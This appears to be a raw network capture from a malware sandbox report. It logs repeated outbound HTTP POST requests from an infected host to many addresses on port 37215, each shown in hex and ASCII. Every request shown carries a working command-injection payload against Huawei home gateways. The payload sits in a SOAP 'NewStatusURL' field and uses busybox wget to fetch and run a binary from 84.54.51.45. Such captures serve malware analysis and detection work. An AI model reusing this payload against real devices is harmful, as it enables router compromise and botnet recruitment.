2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1100192.168.2.154380241.184.193.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173346043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1101192.168.2.154751241.20.253.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173347950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1102192.168.2.155468241.36.173.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173379898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1103192.168.2.153720241.245.245.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173412085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1104192.168.2.154865241.155.148.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173432112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1105192.168.2.155173241.82.233.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173490047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1106192.168.2.156066241.51.193.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173491955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1107192.168.2.153958841.90.79.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173515081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1108192.168.2.153744041.44.177.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173552990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1109192.168.2.153812241.71.183.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173573017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1110192.168.2.154179041.98.45.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173608065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
